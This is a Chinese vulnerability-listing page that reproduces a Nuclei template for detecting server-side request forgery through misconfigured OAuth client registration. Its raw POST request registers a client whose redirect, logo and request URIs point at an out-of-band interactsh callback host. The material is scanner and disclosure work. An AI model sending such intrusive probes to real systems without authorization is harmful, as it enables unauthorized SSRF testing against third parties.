ssrf-via-oauth-misconfig: SSRF due to misconfiguration in OAuth

日期: 2025-08-01 | 影响软件: OAuth | POC: 已公开

漏洞描述

Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.

PoC代码[已公开]

id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  reference:
    - https://portswigger.net/research/hidden-oauth-attack-vectors
  metadata:
    max-request: 1
  tags: misconfig,oast,oauth,ssrf,intrusive,vuln

http:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Language: en-US,en;q=0.9

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a0047304502203a5d82d8f617f407f7f47a39bcf1b244e6095886247d1fe136c6261734771484022100c5b233a78d473b497e8d9d3617a6cdef86844cb3ea5de84b81f7408f2e4e9c73:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/ssrf-via-oauth-misconfig.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐